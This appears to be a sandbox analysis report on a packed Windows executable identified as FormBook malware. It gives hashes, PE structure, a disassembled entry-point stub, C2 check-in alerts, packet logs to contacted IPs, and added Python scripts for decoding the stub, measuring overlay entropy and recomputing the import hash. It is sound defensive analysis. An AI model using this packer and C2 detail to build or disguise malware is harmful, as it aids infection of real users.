                                                                                   Swift-pdf.exe                           malicious   104.21.13.164
                                                                                   Order _ 08201450.doc                    malicious   172.67.188.154
                                                                                   aLLEK0YD2O.exe                          malicious   104.21.13.164
                                                                                   Statement SKBMT 09818.jar               malicious   66.235.200.145
                                                                                   DOC98374933_JULY2021.EXE                malicious   172.67.203.175
                                                                                   Specifications_Details_20337_FLQ.exe    malicious   172.67.188.154
                                                                                   RFQ - 4 SCH 160 EQUAL TEE.doc           malicious   172.67.169.145
                                                                                   RIi1iCfuVK.exe                          malicious   104.21.51.99
                                                                                   kkXJRT8vEl.exe                          malicious   104.21.51.99
                                                                                   kS2dqbsDwD.exe                          malicious   104.25.234.53

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                No created / dropped files found

                                                                Static File Info

                                                                General

                                                                File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit): 7.969197227754621
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name: 85vLO1Rpcy.exe
                                                                File size: 177038 bytes
                                                                MD5: 91663bee11ec2466c36ff85805041fff
                                                                SHA1: 944de18e73bbcf9807c960ba925641211d46cd6e
                                                                SHA256: b764504a2998416edbba85e1495c8311f8cc94f5775ce3413b8d3cbd5acf03d7
                                                                SHA512: 040ca62d7816cbaeb4983defb2905ac8c6e2358b3b10b43b44948d9d521bb194253e292f525a06109490a2d22ca6db2b20654d17cfadaa16ba1c3ae15d0a1a92
                                                                SSDEEP: 3072:Se8sLVMMnySqjooMKC8r8onTKtd5xYMhVwHlKKUQKZ/1CUmXAgrhIWS2OWYilqje:SEL6MyS8oB3KnIdD18gKUQKTCUpgrhIq
                                                                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=Wu.\9&.\9&.\9&.$.&.\9&.\8&.\9&.$.&.\9&.$.&.\9&Rich.\9&........................PE..L....;.`...................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint: 0x401000
                                                                Entrypoint Section: .text
                                                                Digitally signed: false
                                                                Imagebase: 0x400000
                                                                Subsystem: windows gui
                                                                Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp: 0x60F93B1D [Thu Jul 22 09:32:13 2021 UTC]
                                                                TLS Callbacks: (none)
                                                                CLR (.Net) Version: (none; native code)
                                                                OS Version Major: 5
                                                                OS Version Minor: 0
                                                                File Version Major: 5
                                                                File Version Minor: 0
                                                                Subsystem Version Major: 5
                                                                Subsystem Version Minor: 0
                                                                Import Hash: 63b0867460dd31e465a337a5e3e003e6

                                                                Entrypoint Preview

                                                                Instruction
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 00000670h
                                                                mov byte ptr [ebp-00000288h], FFFFFFE9h
                                                                mov byte ptr [ebp-00000287h], FFFFFF90h
                                                                mov byte ptr [ebp-00000286h], 00000000h
                                                                mov byte ptr [ebp-00000285h], 00000000h
                                                                mov byte ptr [ebp-00000284h], 00000000h
                                                                mov byte ptr [ebp-00000283h], 00000055h
                                                                mov byte ptr [ebp-00000282h], FFFFFF8Bh
                                                                mov byte ptr [ebp-00000281h], FFFFFFECh
                                                                mov byte ptr [ebp-00000280h], 00000056h
                                                                mov byte ptr [ebp-0000027Fh], FFFFFF8Bh
                                                                mov byte ptr [ebp-0000027Eh], 00000075h
                                                                mov byte ptr [ebp-0000027Dh], 00000008h
                                                                mov byte ptr [ebp-0000027Ch], FFFFFFBAh
                                                                mov byte ptr [ebp-0000027Bh], FFFFFFEFh
                                                                mov byte ptr [ebp-0000027Ah], 00000012h
                                                                mov byte ptr [ebp-00000279h], 00000000h
                                                                mov byte ptr [ebp-00000278h], 00000000h
                                                                mov byte ptr [ebp-00000277h], 00000057h
                                                                mov byte ptr [ebp-00000276h], FFFFFFEBh
                                                                mov byte ptr [ebp-00000275h], 0000000Eh
                                                                mov byte ptr [ebp-00000274h], FFFFFF8Bh
                                                                mov byte ptr [ebp-00000273h], FFFFFFCAh
                                                                mov byte ptr [ebp-00000272h], FFFFFFD1h
                                                                mov byte ptr [ebp-00000271h], FFFFFFE8h
                                                                mov byte ptr [ebp-00000270h], FFFFFFC1h
                                                                mov byte ptr [ebp-0000026Fh], FFFFFFE1h
                                                                mov byte ptr [ebp-0000026Eh], 00000007h
                                                                mov byte ptr [ebp+00000000h], 00000000h
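The preview above shows the entry point doing nothing but storing immediates one byte at a time into a stack buffer starting at [ebp-0x288]: the code that runs next is assembled at run time, so a static disassembly of .text never contains it. The script below is an added example, not part of the Joe Sandbox report; its only input is the listing exactly as printed above. It collects the stores, masks the sign-extended immediates (FFFFFFE9h is the byte 0xE9) back to bytes and emits each contiguous run in address order. Reassembled, the 27 bytes are E9 90 00 00 00 (jmp +0x90) followed by push ebp / mov ebp,esp / push esi / mov esi,[ebp+8] / mov edx,0x12EF / push edi / jmp short +0x0E / mov ecx,edx / shr eax,1 / shl ecx,7, which reads like the prologue of a routine that takes a pointer argument and a 0x12EF-byte length, the shape of a decryption loop over an embedded blob. Only the first 27 stores are in the preview; the rest of the buffer has to be dumped from memory after the stores complete.

```python
import re

# Entrypoint preview lines as printed in the report (copied verbatim).
ENTRYPOINT_PREVIEW = """\
push ebp
mov ebp, esp
sub esp, 00000670h
mov byte ptr [ebp-00000288h], FFFFFFE9h
mov byte ptr [ebp-00000287h], FFFFFF90h
mov byte ptr [ebp-00000286h], 00000000h
mov byte ptr [ebp-00000285h], 00000000h
mov byte ptr [ebp-00000284h], 00000000h
mov byte ptr [ebp-00000283h], 00000055h
mov byte ptr [ebp-00000282h], FFFFFF8Bh
mov byte ptr [ebp-00000281h], FFFFFFECh
mov byte ptr [ebp-00000280h], 00000056h
mov byte ptr [ebp-0000027Fh], FFFFFF8Bh
mov byte ptr [ebp-0000027Eh], 00000075h
mov byte ptr [ebp-0000027Dh], 00000008h
mov byte ptr [ebp-0000027Ch], FFFFFFBAh
mov byte ptr [ebp-0000027Bh], FFFFFFEFh
mov byte ptr [ebp-0000027Ah], 00000012h
mov byte ptr [ebp-00000279h], 00000000h
mov byte ptr [ebp-00000278h], 00000000h
mov byte ptr [ebp-00000277h], 00000057h
mov byte ptr [ebp-00000276h], FFFFFFEBh
mov byte ptr [ebp-00000275h], 0000000Eh
mov byte ptr [ebp-00000274h], FFFFFF8Bh
mov byte ptr [ebp-00000273h], FFFFFFCAh
mov byte ptr [ebp-00000272h], FFFFFFD1h
mov byte ptr [ebp-00000271h], FFFFFFE8h
mov byte ptr [ebp-00000270h], FFFFFFC1h
mov byte ptr [ebp-0000026Fh], FFFFFFE1h
mov byte ptr [ebp-0000026Eh], 00000007h
mov byte ptr [ebp+00000000h], 00000000h
"""

# One `mov byte ptr [ebp<sign><offset>h], <imm>h` store per line.
STORE_RE = re.compile(r"mov byte ptr \[ebp([+-])([0-9A-Fa-f]+)h\],\s*([0-9A-Fa-f]+)h")


def reconstruct_stack_buffer(listing: str) -> dict:
    """Map ebp-relative offset -> byte for every byte store in the listing.
    The disassembler prints imm8 values sign-extended to 32 bits, so the
    value is masked to its low byte."""
    stores = {}
    for sign, off_hex, imm_hex in STORE_RE.findall(listing):
        off = int(off_hex, 16) * (-1 if sign == "-" else 1)
        stores[off] = int(imm_hex, 16) & 0xFF
    return stores


def contiguous_runs(stores: dict) -> list:
    """Sort the stores by address and split them into contiguous runs;
    each run is one buffer the stub writes as a unit. The stray store to
    [ebp+0] in the preview lands in its own run because it is not adjacent."""
    runs, current, start, prev = [], bytearray(), None, None
    for off in sorted(stores):
        if prev is not None and off != prev + 1:
            runs.append((start, bytes(current)))
            current, start = bytearray(), None
        if start is None:
            start = off
        current.append(stores[off])
        prev = off
    if current:
        runs.append((start, bytes(current)))
    return runs


def decode_entrypoint(listing: str = ENTRYPOINT_PREVIEW) -> list:
    """Return [(start_offset, hex_bytes)] for every run, lowest address first."""
    return [(start, data.hex()) for start, data in contiguous_runs(reconstruct_stack_buffer(listing))]


if __name__ == "__main__":
    for start, data in decode_entrypoint():
        print(f"[ebp{start:+#x}] {data}")
```

The hex string of the first run can be fed straight into a disassembler (or `objdump -D -b binary -m i386`) to recover the instructions listed in the lead-in; the second run is the single stray byte at [ebp+0].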

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [LNK] VS2008 SP1 build 30729

                                                                Data Directories

                                                                Name                                  Virtual Address   Virtual Size   Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x3070            0x78           .rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT             0x3000            0x70           .rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0               0x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0               0x0

                                                                Sections

                                                                Name     Virtual Address   Virtual Size   Raw Size   Xored PE   ZLIB Complexity   File Type   Entropy         Characteristics
                                                                .text    0x1000            0x10e8         0x1200     False      0.476996527778    data        4.706153126     IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rdata   0x3000            0x234          0x400      False      0.3125            data        2.64202346139   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
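Two numbers from the static sections belong together: the whole file has entropy 7.97, yet the only two sections (.text at 4.71, .rdata at 2.64) total 0x1200 + 0x400 = 5632 raw bytes against a file size of 177038. At least 170 KB therefore lies past the end of the last section, in an overlay that no section header maps and that the entry-point stub has to locate and decode itself. The script below is an added example rather than anything from the report: it finds the overlay with only the standard library, reports per-section and overlay entropy the same way the table does (bits per byte), and includes a small constructed PE32 builder so it can be exercised without the sample. The section-header field layout is the documented one; the builder's 0x200 file alignment and header sizes are assumptions sufficient for the parser.

```python
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Return [(name, virtual_address, virtual_size, raw_offset, raw_size)]
    from the section table of a PE32/PE32+ image, no external library."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(nsections):
        off = table + i * 40
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_off = struct.unpack_from("<IIII", pe, off + 8)
        sections.append((name, va, vsize, raw_off, raw_size))
    return sections


def overlay_report(pe: bytes) -> dict:
    """Everything after the last section's raw bytes is the overlay. Crypted
    loaders frequently keep the real payload there, so compare its size and
    entropy with the mapped sections before trusting the section table."""
    sections = parse_sections(pe)
    end_of_image = max((o + s for _, _, _, o, s in sections), default=0)
    overlay = pe[end_of_image:]
    return {
        "file_size": len(pe),
        "overlay_offset": end_of_image,
        "overlay_size": len(overlay),
        "overlay_entropy": round(shannon_entropy(overlay), 3),
        "whole_file_entropy": round(shannon_entropy(pe), 3),
        "sections": [(name, hex(va), hex(vs), hex(s), round(shannon_entropy(pe[o:o + s]), 3))
                     for name, va, vs, o, s in sections],
    }


def build_test_pe(sections: list, overlay: bytes) -> bytes:
    """Constructed minimal PE32 (assumed layout, not the sample): DOS stub,
    COFF header, zeroed optional header, section table, 0x200-aligned raw data."""
    nsec = len(sections)
    opt_size = 0xE0                                   # PE32 optional header
    headers_len = (0x40 + 4 + 20 + opt_size + 40 * nsec + 0x1FF) & ~0x1FF
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    table, body, raw_off, va = bytearray(), bytearray(), headers_len, 0x1000
    for name, data in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), va, raw_size, raw_off, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_off += raw_size
        va += 0x1000
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)).ljust(headers_len, b"\0")
    return header + bytes(body) + overlay


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        print(overlay_report(fh.read()))
```

Run it as `python overlay.py 85vLO1Rpcy.exe` on the sample itself: an overlay of roughly 170 KB at entropy near 8 next to a 4.7-entropy .text is the packed-payload shape the report's numbers describe, and the overlay offset is where carving or a memory dump comparison should start.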

                                                                Imports

                                                                DLL            Imports
                                                                USER32.dll     GetDC, GrayStringA
                                                                OLEAUT32.dll   VarCyFromI4, VARIANT_UserSize, DispGetIDsOfNames, VariantChangeTypeEx, VarI4FromI1, SafeArrayGetElement, VarDecFromUI1, VarR8FromI4, VarDiv
                                                                WINSPOOL.DRV   ConnectToPrinterDlg, AddPortW, DeleteFormW, EnumPrintProcessorDatatypesA
                                                                dbghelp.dll    MakeSureDirectoryPathExists, SymGetLineFromAddr64
                                                                WS2_32.dll     WSAAsyncGetProtoByNumber, htons, WSACleanup, getprotobynumber, ntohs
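The Import Hash field is the MD5 of this table after the normalization pefile applies (library name lowercased with a .dll/.ocx/.sys extension stripped, function name lowercased, entries joined as `lib.func` with commas in import-directory order). The function below is an added example, not the report's code, and takes the table as listed above; if the listing preserves the on-disk order of the import directory the result equals 63b0867460dd31e465a337a5e3e003e6, and a mismatch means the order differs and the hash should be taken from the binary. Worth noticing while reproducing it: none of these imports can open a socket or issue an HTTP request, so the traffic in the Network Behavior section comes from APIs resolved at run time rather than from this table. The imphash therefore identifies the crypter stub, which is what makes it useful for clustering other samples wrapped by the same packer.

```python
import hashlib

# Import table as listed in the report above.
IMPORTS = [
    ("USER32.dll", ["GetDC", "GrayStringA"]),
    ("OLEAUT32.dll", ["VarCyFromI4", "VARIANT_UserSize", "DispGetIDsOfNames",
                      "VariantChangeTypeEx", "VarI4FromI1", "SafeArrayGetElement",
                      "VarDecFromUI1", "VarR8FromI4", "VarDiv"]),
    ("WINSPOOL.DRV", ["ConnectToPrinterDlg", "AddPortW", "DeleteFormW",
                      "EnumPrintProcessorDatatypesA"]),
    ("dbghelp.dll", ["MakeSureDirectoryPathExists", "SymGetLineFromAddr64"]),
    ("WS2_32.dll", ["WSAAsyncGetProtoByNumber", "htons", "WSACleanup",
                    "getprotobynumber", "ntohs"]),
]

STRIPPED_EXTENSIONS = ("dll", "ocx", "sys")


def normalize_library(dll: str) -> str:
    """'USER32.dll' -> 'user32', but 'WINSPOOL.DRV' stays 'winspool.drv':
    only .dll/.ocx/.sys are dropped, as in pefile's get_imphash()."""
    lib = dll.lower()
    base, dot, ext = lib.rpartition(".")
    return base if dot and ext in STRIPPED_EXTENSIONS else lib


def imphash_string(imports: list) -> str:
    """The comma-joined 'lib.func' list that is hashed. Imports by ordinal
    would appear as 'ordN' (pefile additionally resolves known ordinals for
    a few libraries); every entry in this sample is imported by name."""
    parts = []
    for dll, funcs in imports:
        lib = normalize_library(dll)
        parts.extend(f"{lib}.{func.lower()}" for func in funcs)
    return ",".join(parts)


def imphash(imports: list) -> str:
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print(imphash_string(IMPORTS))
    print(imphash(IMPORTS))
```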

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                Timestamp                   Protocol   SID       Message                                Source Port   Dest Port   Source IP        Dest IP
                                                                07/22/21-17:58:53.783078    TCP        1201      ATTACK-RESPONSES 403 Forbidden         80            49760       34.102.136.180   192.168.2.4
                                                                07/22/21-17:59:47.938975    TCP        2031453   ET TROJAN FormBook CnC Checkin (GET)   49769         80          192.168.2.4      172.67.129.33
                                                                07/22/21-17:59:47.938975    TCP        2031449   ET TROJAN FormBook CnC Checkin (GET)   49769         80          192.168.2.4      172.67.129.33
                                                                07/22/21-17:59:47.938975    TCP        2031412   ET TROJAN FormBook CnC Checkin (GET)   49769         80          192.168.2.4      172.67.129.33
                                                                07/22/21-17:59:53.264167    TCP        1201      ATTACK-RESPONSES 403 Forbidden         80            49770       34.102.136.180   192.168.2.4

                                                                Network Port Distribution

                                                                TCP Packets

                                                                Timestamp                              Source Port   Dest Port   Source IP        Dest IP
                                                                Jul 22, 2021 17:58:53.597157001 CEST   49760         80          192.168.2.4      34.102.136.180
                                                                Jul 22, 2021 17:58:53.640444040 CEST   80            49760       34.102.136.180   192.168.2.4
                                                                Jul 22, 2021 17:58:53.643758059 CEST   49760         80          192.168.2.4      34.102.136.180
                                                                Jul 22, 2021 17:58:53.644109964 CEST   49760         80          192.168.2.4      34.102.136.180
                                                                Jul 22, 2021 17:58:53.687212944 CEST   80            49760       34.102.136.180   192.168.2.4
                                                                Jul 22, 2021 17:58:53.783077955 CEST   80            49760       34.102.136.180   192.168.2.4
                                                                Jul 22, 2021 17:58:53.783103943 CEST   80            49760       34.102.136.180   192.168.2.4
                                                                Jul 22, 2021 17:58:53.783427000 CEST   49760         80          192.168.2.4      34.102.136.180
                                                                Jul 22, 2021 17:58:53.783457994 CEST   49760         80          192.168.2.4      34.102.136.180
                                                                Jul 22, 2021 17:58:54.278949022 CEST   49760         80          192.168.2.4      34.102.136.180
                                                                Jul 22, 2021 17:58:54.322173119 CEST   80            49760       34.102.136.180   192.168.2.4
                                                                Jul 22, 2021 17:58:58.867496967 CEST   49761         80          192.168.2.4      64.227.87.162
                                                                Jul 22, 2021 17:58:59.059680939 CEST   80            49761       64.227.87.162    192.168.2.4
                                                                Jul 22, 2021 17:58:59.060267925 CEST   49761         80          192.168.2.4      64.227.87.162
                                                                Jul 22, 2021 17:58:59.060558081 CEST   49761         80          192.168.2.4      64.227.87.162
                                                                Jul 22, 2021 17:58:59.252859116 CEST   80            49761       64.227.87.162    192.168.2.4
                                                                Jul 22, 2021 17:58:59.252990961 CEST   80            49761       64.227.87.162    192.168.2.4
                                                                Jul 22, 2021 17:58:59.253041983 CEST   80            49761       64.227.87.162    192.168.2.4
                                                                Jul 22, 2021 17:58:59.253340006 CEST   49761         80          192.168.2.4      64.227.87.162
                                                                Jul 22, 2021 17:58:59.253437996 CEST   49761         80          192.168.2.4      64.227.87.162
                                                                Jul 22, 2021 17:58:59.447355032 CEST   80            49761       64.227.87.162    192.168.2.4
                                                                Jul 22, 2021 17:59:04.433288097 CEST   49762         80          192.168.2.4      78.47.57.7
                                                                Jul 22, 2021 17:59:04.503684998 CEST   80            49762       78.47.57.7       192.168.2.4
                                                                Jul 22, 2021 17:59:04.503810883 CEST   49762         80          192.168.2.4      78.47.57.7
                                                                Jul 22, 2021 17:59:04.504060984 CEST   49762         80          192.168.2.4      78.47.57.7
                                                                Jul 22, 2021 17:59:04.574091911 CEST   80            49762       78.47.57.7       192.168.2.4
                                                                Jul 22, 2021 17:59:04.887867928 CEST   80            49762       78.47.57.7       192.168.2.4
                                                                Jul 22, 2021 17:59:04.888128042 CEST   80            49762       78.47.57.7       192.168.2.4
                                                                Jul 22, 2021 17:59:04.888236046 CEST   49762         80          192.168.2.4      78.47.57.7
                                                                Jul 22, 2021 17:59:04.888264894 CEST   49762         80          192.168.2.4      78.47.57.7
                                                                Jul 22, 2021 17:59:04.958375931 CEST   80            49762       78.47.57.7       192.168.2.4
                                                                Jul 22, 2021 17:59:10.000493050 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:10.061440945 CEST   80            49763       89.46.109.25     192.168.2.4
                                                                Jul 22, 2021 17:59:10.061651945 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:10.061862946 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:10.122525930 CEST   80            49763       89.46.109.25     192.168.2.4
                                                                Jul 22, 2021 17:59:10.122562885 CEST   80            49763       89.46.109.25     192.168.2.4
                                                                Jul 22, 2021 17:59:10.122580051 CEST   80            49763       89.46.109.25     192.168.2.4
                                                                Jul 22, 2021 17:59:10.122884989 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:10.122971058 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:10.421156883 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:11.030420065 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:12.233558893 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:14.640782118 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:15.195692062 CEST   49764         80          192.168.2.4      104.21.86.209
                                                                Jul 22, 2021 17:59:15.237159014 CEST   80            49764       104.21.86.209    192.168.2.4
                                                                Jul 22, 2021 17:59:15.237281084 CEST   49764         80          192.168.2.4      104.21.86.209
                                                                Jul 22, 2021 17:59:15.237628937 CEST   49764         80          192.168.2.4      104.21.86.209
                                                                Jul 22, 2021 17:59:15.278980017 CEST   80            49764       104.21.86.209    192.168.2.4
                                                                Jul 22, 2021 17:59:15.681235075 CEST   80            49764       104.21.86.209    192.168.2.4
                                                                Jul 22, 2021 17:59:15.681271076 CEST   80            49764       104.21.86.209    192.168.2.4
                                                                Jul 22, 2021 17:59:15.681294918 CEST   80            49764       104.21.86.209    192.168.2.4
                                                                Jul 22, 2021 17:59:15.681312084 CEST   80            49764       104.21.86.209    192.168.2.4
                                                                Jul 22, 2021 17:59:15.681531906 CEST   49764         80          192.168.2.4      104.21.86.209
                                                                Jul 22, 2021 17:59:15.681598902 CEST   49764         80          192.168.2.4      104.21.86.209
                                                                Jul 22, 2021 17:59:15.681621075 CEST   80            49764       104.21.86.209    192.168.2.4
                                                                Jul 22, 2021 17:59:15.681715965 CEST   49764         80          192.168.2.4      104.21.86.209
                                                                Jul 22, 2021 17:59:19.453015089 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:26.209660053 CEST   49766         80          192.168.2.4      104.21.40.211
                                                                Jul 22, 2021 17:59:26.251007080 CEST   80            49766       104.21.40.211    192.168.2.4
                                                                Jul 22, 2021 17:59:26.254384041 CEST   49766         80          192.168.2.4      104.21.40.211
                                                                Jul 22, 2021 17:59:26.254539013 CEST   49766         80          192.168.2.4      104.21.40.211
                                                                Jul 22, 2021 17:59:26.295691013 CEST   80            49766       104.21.40.211    192.168.2.4
                                                                Jul 22, 2021 17:59:26.328947067 CEST   80            49766       104.21.40.211    192.168.2.4
                                                                Jul 22, 2021 17:59:26.328969002 CEST   80            49766       104.21.40.211    192.168.2.4
                                                                Jul 22, 2021 17:59:26.329005957 CEST   80            49766       104.21.40.211    192.168.2.4
                                                                Jul 22, 2021 17:59:26.329252005 CEST   49766         80          192.168.2.4      104.21.40.211
                                                                Jul 22, 2021 17:59:26.329374075 CEST   49766         80          192.168.2.4      104.21.40.211
                                                                Jul 22, 2021 17:59:29.063158035 CEST   49763         80          192.168.2.4      89.46.109.25
                                                                Jul 22, 2021 17:59:42.142477989 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:42.308490038 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:42.309855938 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:42.309887886 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:42.475857019 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:42.799355030 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:43.005626917 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:43.077874899 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:43.077910900 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:43.077923059 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:43.078068972 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:43.078102112 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:43.078602076 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:43.079334974 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:43.079477072 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:43.079710007 CEST   80            49768       162.241.62.54    192.168.2.4
                                                                Jul 22, 2021 17:59:43.079770088 CEST   49768         80          192.168.2.4      162.241.62.54
                                                                Jul 22, 2021 17:59:47.896868944 CEST   49769         80          192.168.2.4      172.67.129.33
                                                                Jul 22, 2021 17:59:47.938344955 CEST   80            49769       172.67.129.33    192.168.2.4
                                                                Jul 22, 2021 17:59:47.938543081 CEST   49769         80          192.168.2.4      172.67.129.33
                                                                Jul 22, 2021 17:59:47.938975096 CEST   49769         80          192.168.2.4      172.67.129.33
                                                                Jul 22, 2021 17:59:47.980230093 CEST   80            49769       172.67.129.33    192.168.2.4
                                                                Jul 22, 2021 17:59:48.012661934 CEST   80            49769       172.67.129.33    192.168.2.4
                                                                Jul 22, 2021 17:59:48.012758970 CEST   80            49769       172.67.129.33    192.168.2.4
                                                                Jul 22, 2021 17:59:48.013010979 CEST   49769         80          192.168.2.4      172.67.129.33
                                                                Jul 22, 2021 17:59:48.013118982 CEST   49769         80          192.168.2.4      172.67.129.33
                                                                Jul 22, 2021 17:59:48.054305077 CEST   80            49769       172.67.129.33    192.168.2.4
                                                                Jul 22, 2021 17:59:53.083327055 CEST   49770         80          192.168.2.4      34.102.136.180
                                                                Jul 22, 2021 17:59:53.125459909 CEST   80            49770       34.102.136.180   192.168.2.4
                                                                Jul 22, 2021 17:59:53.125825882 CEST4977080192.168.2.434.102.136.180
                                                                Jul 22, 2021 17:59:53.125844002 CEST4977080192.168.2.434.102.136.180

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 17:57:36.313282967 CEST | 65298 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:36.315349102 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:36.370449066 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:36.376116037 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:37.161740065 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:37.223788977 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:40.991270065 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:41.046431065 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:42.190628052 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:42.242769003 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:43.205693007 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:43.254811049 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:44.032094955 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:44.097603083 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:44.927361012 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Jul 22, 2021 17:57:44.984817982 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Jul 22, 2021 17:57:45.935471058 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
